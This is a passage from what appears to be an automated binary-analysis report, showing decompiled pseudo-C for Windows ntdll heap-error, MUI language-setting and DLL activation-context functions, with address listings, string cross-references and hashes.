                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                        • API String ID: 0-108210295
                                                        • Opcode ID: bbf0ab90e2eb780a1c18f39ce569b6b646fc88508b156f824eb92ce096b72de6
                                                        • Instruction ID: ca023fcd4db128610de57d1ea31c94731e92ca20d8f387180b76bac2d53d1975
                                                        • Opcode Fuzzy Hash: bbf0ab90e2eb780a1c18f39ce569b6b646fc88508b156f824eb92ce096b72de6
                                                        • Instruction Fuzzy Hash: 2E818331A41210FFEB217E05CC45E3B3B6AAFC6B65F014568F504AB25AE268F401DBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04951C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E04951C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x48748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0489B150();
				} else {
					E0489B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x498589c);
				E0489B150("Heap error detected at %p (heap handle %p)\n",  *0x49858a0);
				_t27 =  *0x4985898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04951E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0489B150();
				} else {
					E0489B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0489B150("Error code: %d - %s\n",  *0x4985898);
				_t113 =  *0x49858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0489B150();
					} else {
						E0489B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0489B150("Parameter1: %p\n",  *0x49858a4);
				}
				_t115 =  *0x49858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0489B150();
					} else {
						E0489B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0489B150("Parameter2: %p\n",  *0x49858a8);
				}
				_t117 =  *0x49858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0489B150();
					} else {
						E0489B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0489B150("Parameter3: %p\n",  *0x49858ac);
				}
				_t119 =  *0x49858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0489B150();
					} else {
						E0489B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x49858b4);
					E0489B150("Last known valid blocks: before - %p, after - %p\n",  *0x49858b0);
				} else {
					_t120 =  *0x49858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0489B150();
				} else {
					E0489B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0489B150("Stack trace available at %p\n", 0x49858c0);
			}











                                                        0x04951c10
                                                        0x04951c16
                                                        0x04951c1e
                                                        0x04951c3d
                                                        0x04951c3e
                                                        0x04951c20
                                                        0x04951c35
                                                        0x04951c3a
                                                        0x04951c44
                                                        0x04951c55
                                                        0x04951c5a
                                                        0x04951c65
                                                        0x04951c67
                                                        0x00000000
                                                        0x04951c6e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04951c67
                                                        0x04951cdc
                                                        0x04951ce5
                                                        0x04951d04
                                                        0x04951d05
                                                        0x04951ce7
                                                        0x04951cfc
                                                        0x04951d01
                                                        0x04951d0b
                                                        0x04951d17
                                                        0x04951d1f
                                                        0x04951d25
                                                        0x04951d30
                                                        0x04951d4f
                                                        0x04951d50
                                                        0x04951d32
                                                        0x04951d47
                                                        0x04951d4c
                                                        0x04951d61
                                                        0x04951d67
                                                        0x04951d68
                                                        0x04951d6e
                                                        0x04951d79
                                                        0x04951d98
                                                        0x04951d99
                                                        0x04951d7b
                                                        0x04951d90
                                                        0x04951d95
                                                        0x04951daa
                                                        0x04951db0
                                                        0x04951db1
                                                        0x04951db7
                                                        0x04951dc2
                                                        0x04951de1
                                                        0x04951de2
                                                        0x04951dc4
                                                        0x04951dd9
                                                        0x04951dde
                                                        0x04951df3
                                                        0x04951df9
                                                        0x04951dfa
                                                        0x04951e00
                                                        0x04951e0a
                                                        0x04951e13
                                                        0x04951e32
                                                        0x04951e33
                                                        0x04951e15
                                                        0x04951e2a
                                                        0x04951e2f
                                                        0x04951e39
                                                        0x04951e4a
                                                        0x04951e02
                                                        0x04951e02
                                                        0x04951e08
                                                        0x00000000
                                                        0x00000000
                                                        0x04951e08
                                                        0x04951e5b
                                                        0x04951e7a
                                                        0x04951e7b
                                                        0x04951e5d
                                                        0x04951e72
                                                        0x04951e77
                                                        0x04951e95

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                        • API String ID: 0-2897834094
                                                        • Opcode ID: 2d0000c931f27112d4b7f367e34e5c56333a08c07e54f6bbdfaa5e8da4649d8b
                                                        • Instruction ID: a445ffbd88067289b7d6c67fde7670a20b3b5dbc76dfc79dd7b40cabc36e00d1
                                                        • Opcode Fuzzy Hash: 2d0000c931f27112d4b7f367e34e5c56333a08c07e54f6bbdfaa5e8da4649d8b
                                                        • Instruction Fuzzy Hash: 3061A532A15544DFE611EB48E486F3073E5EB05A307194E3EF909DB731E6A9FC448B0A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E048A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E048A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E048A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E048A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E048A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E048A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L048B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E048DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E048E1370(_t276, 0x4874e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E048DBB40(0,  &_v68, _t170);
									if(L048A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E048DBB40(_t257,  &_v68, _t243);
								if(L048A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E048E1370(_t278, 0x4874e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L048B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E048DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E048E1370(_v16, 0x4874e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E048DBB40(_t262,  &_v68, _t244);
								if(L048A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E048E1370(_t282, 0x4874e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E048DBB40(_t262,  &_v68, _t201);
							if(L048A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L048B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E048DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E048E1370(_t280, 0x4874e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E048DBB40(_t267,  &_v68, _t245);
							if(L048A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E048E1370(_t284, 0x4874e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E048DBB40(_t267,  &_v68, _t224);
						if(L048A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                        0x048a3d3c
                                                        0x048a3d42
                                                        0x048a3d44
                                                        0x048a3d46
                                                        0x048a3d49
                                                        0x048a3d4c
                                                        0x048a3d4f
                                                        0x048a3d52
                                                        0x048a3d55
                                                        0x048a3d58
                                                        0x048a3d5b
                                                        0x048a3d5f
                                                        0x048a3d61
                                                        0x048a3d66
                                                        0x048f8213
                                                        0x048f8218
                                                        0x048a4085
                                                        0x048a4088
                                                        0x048a408e
                                                        0x048a4094
                                                        0x048a409a
                                                        0x048a40a0
                                                        0x048a40a6
                                                        0x048a40a9
                                                        0x048a40af
                                                        0x048a40b6
                                                        0x048a40bd
                                                        0x048a40bd
                                                        0x048a3d83
                                                        0x048f821f
                                                        0x048f8229
                                                        0x048f8238
                                                        0x048f8238
                                                        0x048f823d
                                                        0x048f823d
                                                        0x048a3da0
                                                        0x048a3daf
                                                        0x048a3db5
                                                        0x048a3dba
                                                        0x048a3dba
                                                        0x048a3dd4
                                                        0x048a3e94
                                                        0x048a3eab
                                                        0x048a3f6d
                                                        0x048a3f84
                                                        0x048a406b
                                                        0x048a406b
                                                        0x048a406e
                                                        0x048a406e
                                                        0x048a4070
                                                        0x048a4074
                                                        0x048f8351
                                                        0x048f8351
                                                        0x048a407a
                                                        0x048a407f
                                                        0x048f835d
                                                        0x048f8370
                                                        0x048f8377
                                                        0x048f8379
                                                        0x048f837c
                                                        0x048f837c
                                                        0x048f835d
                                                        0x00000000
                                                        0x048a407f
                                                        0x048a3f8a
                                                        0x048a3f8d
                                                        0x048a3f90
                                                        0x048a3f95
                                                        0x048f830d
                                                        0x048f830f
                                                        0x048a3f9b
                                                        0x048a3fac
                                                        0x048a3fae
                                                        0x048a3fb1
                                                        0x048a3fb1
                                                        0x048a3fb6
                                                        0x048f8317
                                                        0x048f831a
                                                        0x00000000
                                                        0x048a3fbc
                                                        0x048a3fc1
                                                        0x048a3fc9
                                                        0x048a3fd7
                                                        0x048a3fda
                                                        0x048a3fdd
                                                        0x048a4021
                                                        0x048a4021
                                                        0x048a4029
                                                        0x048a4030
                                                        0x048a4044
                                                        0x048a4046
                                                        0x048a4046
                                                        0x048a4044
                                                        0x048a4049
                                                        0x048f8327
                                                        0x048f8334
                                                        0x048f8339
                                                        0x048f833c
                                                        0x048a404f
                                                        0x048a404f
                                                        0x048a404f
                                                        0x048a4051
                                                        0x048a4056
                                                        0x048a4063
                                                        0x048a4063
                                                        0x048a4068
                                                        0x00000000
                                                        0x048a4068
                                                        0x048a3fdf
                                                        0x048a3fe2
                                                        0x048a3fe4
                                                        0x048a3fe7
                                                        0x048a3fef
                                                        0x048a4003
                                                        0x048a4005
                                                        0x048a4005
                                                        0x048a400c
                                                        0x048a4013
                                                        0x048a4016
                                                        0x048a4017
                                                        0x048a401b
                                                        0x048a401e
                                                        0x00000000
                                                        0x048a401e
                                                        0x048a3fb6
                                                        0x048a3eb1
                                                        0x048a3eb4
                                                        0x048a3eb7
                                                        0x048a3ebc
                                                        0x048f82a9
                                                        0x048f82ab
                                                        0x048a3ec2
                                                        0x048a3ed3
                                                        0x048a3ed5
                                                        0x048a3ed8
                                                        0x048a3ed8
                                                        0x048a3edd
                                                        0x048f82b3
                                                        0x048f82b6
                                                        0x00000000
                                                        0x048a3ee3
                                                        0x048a3ee8
                                                        0x048a3eed
                                                        0x048a3ef0
                                                        0x048a3ef3
                                                        0x048a3f02
                                                        0x048a3f05
                                                        0x048a3f08
                                                        0x048f82c0
                                                        0x048f82c3
                                                        0x048f82c5
                                                        0x048f82c8
                                                        0x048f82d0
                                                        0x048f82e4
                                                        0x048f82e6
                                                        0x048f82e6
                                                        0x048f82ed
                                                        0x048f82f4
                                                        0x048f82f7
                                                        0x048f82f8
                                                        0x048f82fc
                                                        0x048f82ff
                                                        0x048f82ff
                                                        0x048a3f0e
                                                        0x048a3f11
                                                        0x048a3f16
                                                        0x048a3f1d
                                                        0x048a3f31
                                                        0x048f8307
                                                        0x048f8307
                                                        0x048a3f31
                                                        0x048a3f39
                                                        0x048a3f48
                                                        0x048a3f4d
                                                        0x048a3f50
                                                        0x048a3f50
                                                        0x048a3f53
                                                        0x048a3f58
                                                        0x048a3f65
                                                        0x048a3f65
                                                        0x048a3f6a
                                                        0x00000000
                                                        0x048a3f6a
                                                        0x048a3edd
                                                        0x048a3dda
                                                        0x048a3ddd
                                                        0x048a3de0
                                                        0x048a3de5
                                                        0x048f8245
                                                        0x048a3deb
                                                        0x048a3df7
                                                        0x048a3dfc
                                                        0x048a3dfe
                                                        0x048a3e01
                                                        0x048a3e01
                                                        0x048a3e06
                                                        0x048f824d
                                                        0x048f824f
                                                        0x048f8254
                                                        0x00000000
                                                        0x048a3e0c
                                                        0x048a3e11
                                                        0x048a3e16
                                                        0x048a3e19
                                                        0x048a3e29
                                                        0x048a3e2c
                                                        0x048a3e2f
                                                        0x048f825c
                                                        0x048f825f
                                                        0x048f8261
                                                        0x048f8264
                                                        0x048f826c
                                                        0x048f8280
                                                        0x048f8282
                                                        0x048f8282
                                                        0x048f8289
                                                        0x048f8290
                                                        0x048f8293
                                                        0x048f8294
                                                        0x048f8298
                                                        0x048f829b
                                                        0x048f829b
                                                        0x048a3e35
                                                        0x048a3e38
                                                        0x048a3e3d
                                                        0x048a3e44
                                                        0x048a3e58
                                                        0x048f82a3
                                                        0x048f82a3
                                                        0x048a3e58
                                                        0x048a3e60
                                                        0x048a3e6f
                                                        0x048a3e74
                                                        0x048a3e77
                                                        0x048a3e77
                                                        0x048a3e7a
                                                        0x048a3e7f
                                                        0x048a3e8c
                                                        0x048a3e8c
                                                        0x048a3e91
                                                        0x00000000
                                                        0x048a3e91

                                                        Strings
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 048A3E97
                                                        • WindowsExcludedProcs, xrefs: 048A3D6F
                                                        • Kernel-MUI-Number-Allowed, xrefs: 048A3D8C
                                                        • Kernel-MUI-Language-SKU, xrefs: 048A3F70
                                                        • Kernel-MUI-Language-Allowed, xrefs: 048A3DC0
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 0-258546922
                                                        • Opcode ID: 027772a986279b186c16c0cfc94abae92b42a3a80cf2e6110c5440f5d6bcc78f
                                                        • Instruction ID: f938b815a84f444750ace16f4e3cb6aa57b54edcf4347eec7e573f34b921a13b
                                                        • Opcode Fuzzy Hash: 027772a986279b186c16c0cfc94abae92b42a3a80cf2e6110c5440f5d6bcc78f
                                                        • Instruction Fuzzy Hash: 96F13E72D00618EFDB11DF98C9809EEB7B9EF48B54F150A5AE905E7210E7B4BE01DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E048C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x498d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4988464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4985780 & 0x00000003) != 0) {
							E04915510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4985780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E048DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4987984; // 0x261df0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4988464; // 0x73b80110
					 *0x498b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E048C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4985780 & 0x00000005) != 0) {
						_push(_t49);
						E04915510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                        0x048c8e0f
                                                        0x048c8e16
                                                        0x048c8e19
                                                        0x048c8e1b
                                                        0x048c8e21
                                                        0x048c8e7f
                                                        0x048c8e85
                                                        0x04909354
                                                        0x0490936c
                                                        0x04909371
                                                        0x0490937b
                                                        0x04909381
                                                        0x04909381
                                                        0x0490937b
                                                        0x048c8e9d
                                                        0x048c8e9d
                                                        0x048c8e29
                                                        0x048c8e2c
                                                        0x048c8e38
                                                        0x048c8e3e
                                                        0x048c8e43
                                                        0x048c8eb5
                                                        0x048c8eb9
                                                        0x049092aa
                                                        0x049092af
                                                        0x049092e8
                                                        0x049092e8
                                                        0x049092af
                                                        0x048c8eb9
                                                        0x048c8e45
                                                        0x048c8e53
                                                        0x048c8e5b
                                                        0x048c8e5f
                                                        0x048c8e78
                                                        0x048c8e78
                                                        0x048c8e7d
                                                        0x048c8ec3
                                                        0x048c8ecd
                                                        0x048c8ed2
                                                        0x048c8ed2
                                                        0x048c8ec5
                                                        0x048c8ec5
                                                        0x00000000
                                                        0x048c8e7d
                                                        0x048c8e67
                                                        0x048c8ea4
                                                        0x0490931a
                                                        0x00000000
                                                        0x00000000
                                                        0x04909320
                                                        0x048c8ea4
                                                        0x048c8e70
                                                        0x04909325
                                                        0x04909340
                                                        0x04909345
                                                        0x04909345
                                                        0x048c8e76
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Strings
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0490932A
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0490933B, 04909367
                                                        • LdrpFindDllActivationContext, xrefs: 04909331, 0490935D
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 04909357
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 0-3779518884
                                                        • Opcode ID: 7b6ff4055a38f6bfa9c95e34f62c72524d7feede6cbd760777030bd2ed971447
                                                        • Instruction ID: 0d2bfef2c68ab51c62cdb363435afdf373cd5d6c2732d7c7d5cca13d6884b189
